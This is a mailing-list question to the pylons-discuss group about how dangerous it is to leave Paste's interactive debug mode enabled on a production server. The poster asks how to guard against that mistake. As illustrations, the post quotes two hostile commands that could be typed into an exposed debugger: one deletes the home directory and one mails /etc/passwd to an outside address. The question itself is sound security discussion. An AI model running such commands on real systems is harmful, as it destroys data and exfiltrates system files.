Paste's debug mode is great for debugging, since it allows you to
execute any python code right on the machine.
debug mode is controlled via a single variable in the server's ".ini"
file:
[DEFAULT]
debug = true
remember to set this to false on the production server!
imaging what would happen if you accidentally left this to "true" on
the production server. now anyone who causes a debug assertion can
execute ANY code on the host machine. for example, they could type
"import os; os.system('rm -rf ~);", or "os.system('cat /etc/passwd |
mail [email protected]');" right into the paste debugger.
is it true, then, that this one line in the config file can cause a
complete security disaster? this seems like there are not sufficient
safeguards because it is easy to accidentally forget to properly set
this variable in the ini file. it gives me nightmares just thinking
about it.
is there a better safeguard? or do all paste websites (such as reddit,
quora, and so on) share this potential security issue?
--
You received this message because you are subscribed to the Google Groups
"pylons-discuss" group.
To post to this group, send email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/pylons-discuss?hl=en.
